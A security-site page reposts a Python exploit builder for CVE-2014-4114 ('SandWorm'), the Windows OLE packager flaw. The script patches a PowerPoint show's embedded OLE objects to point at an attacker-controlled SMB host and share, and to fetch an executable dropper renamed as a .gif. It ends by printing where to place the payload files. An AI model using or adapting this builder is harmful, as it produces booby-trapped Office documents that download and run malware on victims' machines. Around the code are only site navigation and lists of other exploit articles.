首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Windows OLE Package Manager SandWorm Exploit
来源:@v1ad_o 作者:Ovtchinikov 发布时间:2014-10-21  
#!/usr/bin/env python
import os
import zipfile
import sys
  
'''
Full Exploit: http://www.exploit-db.com/sploits/35019.tar.gz
  
Very quick and ugly [SandWorm CVE-2014-4114] exploit builder
Exploit Title: CVE-2014-4114 SandWorm builder
Built to run on: Linux/MacOSX
Date: 17/10/2014
Exploit Author: Vlad Ovtchinikov (@v1ad_o)
Vendor Homepage: microsoft.com
Tested on: Win7Sp1 64 bit  - Microsoft Offcie 2013 Plus
Demo: http://youtu.be/ljjEkhflpvM
CVE : CVE-2014-4114
NOTE:
expl.inf (md5 8313034e9ab391df83f6a4f242ec5f8d) + expl.zip (md5 4a39121a60cc79d211fc7f7cfe00b707)
should be located in the same  dir as the builder.
01:39 cve-2014-4114.py
19:35 expl.inf
15:37 expl.zip
  
e.g.  python cve-2014-4114.py 10.0.0.233 rdb xxx.exe
10.0.0.233 - ip
rdb - share
xxx.exe - dropper
'''
host=sys.argv[1]
share=sys.argv[2]
mal_file=sys.argv[3]
  
print "\nPoC exploit builder v0.1 for logical OLE flaw in packager.dll [CVE-2014-4114] by vlad@sensepost.com @v1ad_o\n"
print "Building ... \n "
  
# extract the original .ppsx PoC
mal_file= mal_file.replace(' ', '')[:-4].lower()
fh = open('expl.zip', 'rb')
z = zipfile.ZipFile(fh)
for name in z.namelist():
    outpath = "./tmp"
    z.extract(name, outpath)
fh.close()
  
os.mkdir('out')
os.chdir('tmp')
  
# oleObject1.bin mod for GIF
infile = open('ppt/embeddings/oleObject1.bin')
outfile = open('ppt/embeddings/1.bin','w')
replacements = {'10.0.0.34':host,'public':share,'slide1.gif':mal_file+'.gif'}
for line in infile:
    for src, target in replacements.iteritems():
        line = line.replace(src, target)
    outfile.write(line)
infile.close()
outfile.close()
os.remove ('ppt/embeddings/oleObject1.bin')
os.rename ('ppt/embeddings/1.bin','ppt/embeddings/oleObject1.bin')
  
# oleObject2.bin mod for INF
infile = open('ppt/embeddings/oleObject2.bin')
outfile = open('ppt/embeddings/2.bin','w')
replacements = {'10.0.0.34':host,'public':share,'slide1.inf':mal_file+'.inf'}
for line in infile:
    for src, target in replacements.iteritems():
        line = line.replace(src, target)
    outfile.write(line)
infile.close()
outfile.close()
  
os.remove ('ppt/embeddings/oleObject2.bin')
os.rename ('ppt/embeddings/2.bin','ppt/embeddings/oleObject2.bin')
os.system("zip -q  -9 -r  ../out/exploit.ppsx * ")
os.chdir('..')
  
# oleObject2.bin mod for INF prep
infile = open('expl.inf')
outfile = open('out/'+mal_file+'.inf','w')
replacements = {'slide1':mal_file}
for line in infile:
    for src, target in replacements.iteritems():
        line = line.replace(src, target)
    outfile.write(line)
infile.close()
outfile.close()
os.system("rm -rf tmp")
  
print 'Copy the .inf .gif (renamed file.exe=>file.gif) to:\n'
print '*\\\\'+host +'\\'+ share +'\\'+ mal_file+'.gif\n'
print '*\\\\'+host +'\\'+ share +'\\'+ mal_file+'.inf\n'
print 'Done - collect your files from the [out] folder.\n'




 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·ZTE ZXDSL-931VII - Unauthentic
·Numara / BMC Track-It! FileSto
·Drupal HTTP Parameter Key/Valu
·Joomla Akeeba Kickstart Unseri
·Linux PolicyKit Race Condition
·HP Data Protector EXEC_INTEGUT
·MS14-060 Microsoft Windows OLE
·Incredible PBX 11 2.0.6.5.0 Re
·Fonality Trixbox CE 2.8.0.4 Co
·DotNetNuke DNNspot Store 3.0.0
·NETIS DL4322D Multiple Vulnera
·Feng Office 1.7.4 - Arbitrary
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved